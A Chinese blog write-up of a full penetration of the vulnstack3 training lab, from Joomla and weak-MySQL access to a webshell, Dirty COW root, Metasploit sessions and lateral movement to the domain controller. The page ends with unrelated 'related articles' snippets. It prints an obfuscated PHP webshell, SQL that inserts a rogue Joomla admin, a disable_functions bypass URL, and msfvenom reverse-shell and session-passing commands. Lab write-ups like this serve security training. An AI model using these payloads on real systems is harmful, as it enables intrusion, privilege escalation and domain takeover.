当前位置: 首页 > news >正文

【红日靶场】vulnstack3-完整渗透过程

系列文章目录

【红日靶场】vulnstack1-完整渗透过程
【红日靶场】vulnstack2-完整渗透过程
【红日靶场】vulnstack3-完整渗透过程


文章目录

  • 系列文章目录
  • 基本信息
  • 环境配置
  • 开始渗透
    • 信息收集
    • 暴力破解
    • 漏洞利用
    • 绕过
    • 内网信息收集
    • 尝试上线msf
    • 上线msf
    • 横向移动
    • msf 传达会话给cs
    • 横向到域控


基本信息

作者:licong

  • 环境配置:
    打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。
    挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。
    除重新获取ip,不建议进行任何虚拟机操作。
    参考虚拟机网络配置,添加新的网络,该网络作为内部网络。
    注:名称及网段必须符合上述图片,进行了固定ip配置。

描述
目标:域控中存在一份重要文件。
本次环境为黑盒测试,不提供虚拟机账号密码。

环境配置

在这里插入图片描述
centos重启一下网卡:
在这里插入图片描述

开始渗透

信息收集

目标为10.50.128.107:其他目标不知道
在这里插入图片描述
在这里插入图片描述
看这里的图标应该是joomla:
在这里插入图片描述
存在:s2-007
在这里插入图片描述
利用失败,应该是误报
dirb爆破目录:
在这里插入图片描述
这个是后台:
在这里插入图片描述

尝试使用joomla的poc:失败了
在这里插入图片描述

指纹识别:
在这里插入图片描述

暴力破解

上面有个3306爆破一下数据库:
在这里插入图片描述

漏洞利用

没想到是数据库弱密码:
在这里插入图片描述
在这里插入图片描述

这里数据库没有权限:

在这里插入图片描述
用HeidiSQL连接:
在这里插入图片描述
直接用这个数据库做提权试试:
在这里插入图片描述
还是不行,直接获取joomla用户名密码上面我们找到他的后台了:
在这里插入图片描述
将密码保存下来:
在这里插入图片描述
用john解密:
在这里插入图片描述
破解一会:
在这里插入图片描述
等它慢慢跑,再去找找其他的信息:phpinfo界面
在这里插入图片描述
joomla版本信息:
在这里插入图片描述
这个配置下面有个密码像是mysql的配置:
先测试一下登录后台
在这里插入图片描述
登录后台试试:
在这里插入图片描述
不是后台的密码:尝试了admin,testuser
在这里插入图片描述
尝试前台登录:
在这里插入图片描述
在这里插入图片描述

连接成功:
在这里插入图片描述

直接添加一个用户:

USE joomla;INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('julien', 'julien','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());INSERT INTO `am2zu_user_usergroup_map` (`user_id`, `group_id`)
VALUES (LAST_INSERT_ID(), '8');

这里直接给的密码加密过的方式
在这里插入图片描述
还能直接修改为:secret
在这里插入图片描述
我尝试插入数据但是加密过的数据不考虑joomla的加密方式直接修改数据库也是可以的:
在这里插入图片描述
还能尝试爆破使用john工具爆破,但这里用的应该是随机密码爆不出来:
直接登录后台:
在这里插入图片描述
写入shell:
在这里插入图片描述
在这里插入图片描述
写个蚁剑的免杀马:
在这里插入图片描述
保存
在这里插入图片描述
路径:
在这里插入图片描述
感觉像是免杀马问题没连上
在这里插入图片描述
突然想到上面的php版本是7而且禁用了很多危险函数:
在这里插入图片描述
用蚁剑的shell生成:

<?php $mXPo=create_function(base64_decode('JA==').str_rot13('f').str_rot13('b').str_rot13('z').chr(0x32e-0x2c9),base64_decode('ZQ==').chr(558-440).chr(0x17b-0x11a).chr(59940/555).base64_decode('KA==').chr(0x2a7-0x283).str_rot13('f').base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ==').str_rot13(')').chr(50622/858));$mXPo(base64_decode('OTEzO'.'DQ2O0'.'BldkF'.'sKCRf'.''.chr(474-389).chr(642-573).chr(026463/0313).str_rot13('G').chr(429-343).''.''.base64_decode('Rg==').chr(285-170).base64_decode('Mg==').base64_decode('Tg==').chr(01250-01076).''.'ZdKTs'.'yNzQx'.'NTM4O'.'w=='.''));?>

在这里插入图片描述
在这里插入图片描述
成功连接:
在这里插入图片描述

绕过

这里是因为函数禁用的原因:返回ret=127
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在这里插入图片描述

http://10.50.128.107/templates/beez3/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/tmp/bypass_disablefunc_x64.so

成功绕过:
在这里插入图片描述

内网信息收集

查看一下网卡:发现不对劲为内网段
在这里插入图片描述

尝试上线msf

在这里插入图片描述
上传:
在这里插入图片描述
加权限后运行:(失败了)
在这里插入图片描述
这里有个mysql文件夹:
这里添加了一个用户
在这里插入图片描述
这台主机的22端口是开放的尝试登录:
登录成功了
在这里插入图片描述
权限不够:
在这里插入图片描述
尝试上线msf(失败了,这里就不放了)
直接提权:
这里Linux kernel>2.6.22可以直接用脏牛
在这里插入图片描述
脏牛:https://github.com/Rvn0xsy/linux_dirty
在这里插入图片描述
提权到root了
在这里插入图片描述
查看一下网卡:
在这里插入图片描述
那上面那台主机使用的NGINX反向代理代理到这个网口的,所以刚刚的webshell是另外一台的主机:
现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)

我这直接用内网网卡做:msf

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.93.128 LPORT=8888 -f elf > mshell.elfmsfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.93.128
set lport 8888
run

在这里插入图片描述

在这里插入图片描述

内网探测:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这台应该是NGINX反向代理那台:
在这里插入图片描述
fscna探测一下:
在这里插入图片描述

上线msf

上面没成功这里有root权限直接上传马上线:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

横向移动

存在10和20还有30主机现在已经拿到了100和120主机的权限了,在拿下其他的主机:
先整理一下信息:
192.168.93.30 MSBROWSE\WIN7 Windows 7 Professional 7601 Service Pack 1
192.168.93.20 TEST\WIN2008 Windows Server ® 2008 Datacenter 6003 Service Pack 2
192.168.93.10 DC TEST\WIN-8GA56TNV3MV Windows Server 2012 R2 Datacenter 9600

域控制器应该是10地址上,其他win7可能是用户20可能是服务器:
端口方面:
192.168.93.10 :主要关注135和445还有88端口389
192.168.93.20:主要关注80、445、1443和2383
192.168.93.30 :主要关注135、139、443
尝试访问80端口:
在这里插入图片描述
这里可能存在CVE-2020-0618

在这里插入图片描述
我的内网可以直接访问:(大家需要做socke)
直接爆破一下smb:在这里插入图片描述
kali使用smb登录:

在这里插入图片描述
在域内:
在这里插入图片描述
域控为10主机:其实fscan哪里也可以看到
在这里插入图片描述
看一下端口:
在这里插入图片描述
创建监听器:
在这里插入图片描述
在这里插入图片描述

msf 传达会话给cs

msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.93.128
lhost => 192.168.93.128
msf6 exploit(windows/local/payload_inject) > set lport 4422
lport => 4422
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > run

没成功多运行几次
在这里插入图片描述

在这里插入图片描述
抓取密码:
在这里插入图片描述
再次横向移动:
在这里插入图片描述
在这里插入图片描述

横向到域控

成功拿到域控
在这里插入图片描述
再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了
443也爆破不了
在这里插入图片描述
还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。

相关文章:

【红日靶场】vulnstack3-完整渗透过程

系列文章目录 【红日靶场】vulnstack1-完整渗透过程 【红日靶场】vulnstack2-完整渗透过程 【红日靶场】vulnstack3-完整渗透过程 文章目录 系列文章目录基本信息环境配置开始渗透信息收集暴力破解漏洞利用绕过内网信息收集尝试上线msf上线msf横向移动msf 传达会话给cs横向到域…...

物联网通信技术课程作业资料(TPUNB技术)

参考内容 TPUNB无线通信技术 - 技象科技 (techphant.cn) 技象科技CTO郑凛&#xff1a;用最好的物联网服务最多的人 | 了不起的创变者_技术_通信_团队 (sohu.com) LPWAN技术融合使用大势之下&#xff0c;TPUNB奔跑的一年-IOTE物联网展 (baidu.com) 院士认可国际首创&#xf…...

[开源]研发管理项目,支持从需求到代码发布全过程全生命周期管理

一、开源项目简介 neatlogic-rdm支持从需求到代码发布全过程覆盖。具备需求管理、缺陷追踪、测试计划、测试用例、报表仪表板等功能&#xff0c;支持关联外部代码库如GitLab、GitHub等。个性化的属性配置和状态流转控制&#xff0c;能帮助用户管理不同类型项目。 二、开源协议…...

一文生成猫眼电影热榜词云

1.爬取猫眼电影热榜数据 此次爬取的是电影票房的热榜电影名称&#xff0c;具体网站网址为猫眼电影热榜&#xff0c;经过实验观察后发现&#xff0c;此处的数据是通过ajax异步加载的&#xff0c;如果不相信可以使用request对当前网站网址发送请求&#xff0c;会发现无法获取电影…...

监控脚本展示

需求&#xff1a; 监控SVQC&#xff0c;SVCD&#xff0c;FHTC&#xff0c;FHQC&#xff0c;FHCD文件的生成 监控服务器&#xff1a;10.10.3.56 监控路径&#xff1a;/data/app/datafile/ftp/qdttec/10000002/download/yyyyMMdd/* 监控时间&#xff1a;每天7点开始&#xff0c;2…...

【重拾C语言】五、模块化程序设计——函数(定义、调用、参数传递、结果返回、函数原型;典例:打印字符图形、验证哥德巴赫猜想)

目录 前言 五、模块化程序设计——函数 5.1 计算三角形的重心 5.2 函数 5.2.1 函数定义 5.2.2 函数调用 a. 函数调用的形式和过程 b. 参数传递 值传递 指针传递 c. 函数结果返回 5.2.3 函数原型&#xff08;先调用后定义&#xff09; 5.3 程序设计实例 5.3.1 打印…...

Unity实现设计模式——迭代器模式

Unity实现设计模式——迭代器模式 迭代器模式是一种行为型设计模式&#xff0c;它提供了一种统一的方式来访问集合对象中的元素&#xff0c;而不是暴露集合内部的表示方式。简单地说&#xff0c;就是将遍历集合的责任封装到一个单独的对象中&#xff0c;我们可以按照特定的方式…...

【数据结构与算法】之“堆”介绍

目录 堆的基本存储 一、概念及其介绍 二、适用说明 三、结构图示 堆的 shift up 堆的 shift down 基础堆排序 一、概念及其介绍 二、适用说明 三、过程图示 优化堆排序 索引堆及其优化 一、概念及其介绍 二、适用说明 三、结构图示 堆的基本存储 一、概念及其介…...

ncnn Fatal signal 11 (SIGSEGV) 使用GPU加速崩溃

如果你的报错堆栈中包含以下信息,其中的关键信息是 anon:dalvik-classes2.dex extracted in memory Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x3c in tid 8619 (eplabv3plusncnn), pid 8619 () 2023-10-07 15:48:31.395 9793-9793 DEBUG …...

计算机考研 | 2018年 | 计算机组成原理真题

文章目录 【计算机组成原理2018年真题44题-15分】【第一步&#xff1a;信息提取】【第二步&#xff1a;具体解答】 【计算机组成原理2018年真题45题-8分】【第一步&#xff1a;信息提取】【第二步&#xff1a;具体解答】 【计算机组成原理2018年真题44题-15分】 某计算机采用页…...

用Configuration注解的方式写一个java过滤器的详细实例?

在Java中&#xff0c;可以使用Configuration注解和Spring框架来创建和配置过滤器。下面是一个详细的示例&#xff1a; 首先&#xff0c;创建一个实现javax.servlet.Filter接口的过滤器类&#xff0c;例如MyFilter&#xff1a; import javax.servlet.*; import java.io.IOExce…...

基于Springboot实现旧物置换网站平台演示【项目源码+论文说明】分享

基于Springboot实现旧物置换网站平台演示 摘要 随着时代在一步一步在进步&#xff0c;旧物也成人们的烦恼&#xff0c;许多平台网站都在推广自已的产品像天猫、咸鱼、京东。所以开发出一套关于旧物置换网站成为必需。旧物置换网站主要是借助计算机&#xff0c;通过对用户进行管…...

想要精通算法和SQL的成长之路 - 存在重复元素

想要精通算法和SQL的成长之路 - 存在重复元素 前言一. 存在重复元素II二. 存在重复元素III2.1 基于红黑树增删改查 前言 想要精通算法和SQL的成长之路 - 系列导航 一. 存在重复元素II 原题链接 思路&#xff1a; 我们用HashSet存储元素&#xff0c;做到去重的效果。同时存储…...

使用华为eNSP组网试验⑸-访问控制

今天练习使用华为sNSP模拟网络设备上的访问控制&#xff0c;这样的操作我经常在华为的S7706、S5720、S5735或者H3C的S5500、S5130、S7706上进行&#xff0c;在网络设备上根据情况应用访问控制的策略是一个网管必须熟练的操作&#xff0c;只是在真机上操作一般比较谨慎&#xff…...

iPhone苹果手机闹钟智能跳过节假日怎么设置?

国内绝大多数的手机用户使用的操作系统只有三个&#xff0c;安卓、鸿蒙和苹果的ios。而iPhone苹果手机的忠实用户是非常多的&#xff0c;所以日积月累中用户数量也就非常庞大&#xff0c;并且相当一部分用户都是上班族。而工作忙碌的上班族因为事情比较多&#xff0c;为了避免自…...

TenDB Cluster 简介

文章目录 1.简介2.TSpider3.TenDB4.Tdbctl5.TenDB Cluster Operator参考文献 1.简介 TenDB Cluster 是腾讯游戏 CROS DBA 团队提供的 MySQL 分布式关系型数据库解决方案。主要特点包括&#xff1a;透明分库分表、高可用的 MySQL 集群服务&#xff0c;透明及在线的扩容及缩容&a…...

【刷题笔记10.6】LeetCode:翻转二叉树

LeetCode&#xff1a;翻转二叉树 一、题目描述 给你一颗二叉树的根节点root&#xff0c;翻转这颗二叉树&#xff0c;并返回其根节点。 二、分析 我们在做二叉树题目时候&#xff0c;第一想到的应该是用 递归 来解决。 仔细看下题目的 输入 和 输出&#xff0c;输出的左右…...

【高阶数据结构】图详解第一篇:图的基本概念及其存储结构(邻接矩阵和邻接表)

文章目录 1. 图的基本概念1.1 什么是图1.2 有向图和无向图1.3 完全图1.4 邻接顶点1.5 顶点的度1.6 路径1.7 路径长度1.8 简单路径与回路1.9 子图1.10 连通图1.11 强连通图1.12 生成树 2. 图的存储结构2.1 邻接矩阵2.2 邻接矩阵代码实现结构定义构造函数添加边打印图测试 2.3 邻…...

IPV4跟IPV6的区别

如今互联网快速发展ipv4已经满足不了现在的需求&#xff0c;那么这时候就需要用更大的地址空间来代替&#xff0c;这时候ipv6就可以满足这一需求&#xff0c;相比ipv4它有更大的地址空间可供使用。下面我将分享一下有何区别。 IPv4与IPv6之间的区别: 1、地址长度的区别:IPv4具…...

利用fitnesse实现api接口自动化测试

上午在园子里乱逛&#xff0c;看了不少小伙伴们分享的接口测试方面的知识&#xff0c;仔细想想&#xff0c;我做接口测试也有几个年头了&#xff0c;大家所叙述到的一些经验或多或少&#xff0c;我也曾遇到过&#xff0c;突然意识到知识的点滴积累是多么的重要&#xff0c;我记…...

Linux链表操作全解析

Linux C语言链表深度解析与实战技巧 一、链表基础概念与内核链表优势1.1 为什么使用链表&#xff1f;1.2 Linux 内核链表与用户态链表的区别 二、内核链表结构与宏解析常用宏/函数 三、内核链表的优点四、用户态链表示例五、双向循环链表在内核中的实现优势5.1 插入效率5.2 安全…...

MMaDA: Multimodal Large Diffusion Language Models

CODE &#xff1a; https://github.com/Gen-Verse/MMaDA Abstract 我们介绍了一种新型的多模态扩散基础模型MMaDA&#xff0c;它被设计用于在文本推理、多模态理解和文本到图像生成等不同领域实现卓越的性能。该方法的特点是三个关键创新:(i) MMaDA采用统一的扩散架构&#xf…...

苍穹外卖--缓存菜品

1.问题说明 用户端小程序展示的菜品数据都是通过查询数据库获得&#xff0c;如果用户端访问量比较大&#xff0c;数据库访问压力随之增大 2.实现思路 通过Redis来缓存菜品数据&#xff0c;减少数据库查询操作。 缓存逻辑分析&#xff1a; ①每个分类下的菜品保持一份缓存数据…...

前端开发面试题总结-JavaScript篇(一)

文章目录 JavaScript高频问答一、作用域与闭包1.什么是闭包&#xff08;Closure&#xff09;&#xff1f;闭包有什么应用场景和潜在问题&#xff1f;2.解释 JavaScript 的作用域链&#xff08;Scope Chain&#xff09; 二、原型与继承3.原型链是什么&#xff1f;如何实现继承&a…...

LangChain知识库管理后端接口:数据库操作详解—— 构建本地知识库系统的基础《二》

这段 Python 代码是一个完整的 知识库数据库操作模块&#xff0c;用于对本地知识库系统中的知识库进行增删改查&#xff08;CRUD&#xff09;操作。它基于 SQLAlchemy ORM 框架 和一个自定义的装饰器 with_session 实现数据库会话管理。 &#x1f4d8; 一、整体功能概述 该模块…...

【SSH疑难排查】轻松解决新版OpenSSH连接旧服务器的“no matching...“系列算法协商失败问题

【SSH疑难排查】轻松解决新版OpenSSH连接旧服务器的"no matching..."系列算法协商失败问题 摘要&#xff1a; 近期&#xff0c;在使用较新版本的OpenSSH客户端连接老旧SSH服务器时&#xff0c;会遇到 "no matching key exchange method found"​, "n…...

Web中间件--tomcat学习

Web中间件–tomcat Java虚拟机详解 什么是JAVA虚拟机 Java虚拟机是一个抽象的计算机&#xff0c;它可以执行Java字节码。Java虚拟机是Java平台的一部分&#xff0c;Java平台由Java语言、Java API和Java虚拟机组成。Java虚拟机的主要作用是将Java字节码转换为机器代码&#x…...

Vite中定义@软链接

在webpack中可以直接通过符号表示src路径&#xff0c;但是vite中默认不可以。 如何实现&#xff1a; vite中提供了resolve.alias&#xff1a;通过别名在指向一个具体的路径 在vite.config.js中 import { join } from pathexport default defineConfig({plugins: [vue()],//…...

LCTF液晶可调谐滤波器在多光谱相机捕捉无人机目标检测中的作用

中达瑞和自2005年成立以来&#xff0c;一直在光谱成像领域深度钻研和发展&#xff0c;始终致力于研发高性能、高可靠性的光谱成像相机&#xff0c;为科研院校提供更优的产品和服务。在《低空背景下无人机目标的光谱特征研究及目标检测应用》这篇论文中提到中达瑞和 LCTF 作为多…...

《Docker》架构

文章目录 架构模式单机架构应用数据分离架构应用服务器集群架构读写分离/主从分离架构冷热分离架构垂直分库架构微服务架构容器编排架构什么是容器&#xff0c;docker&#xff0c;镜像&#xff0c;k8s 架构模式 单机架构 单机架构其实就是应用服务器和单机服务器都部署在同一…...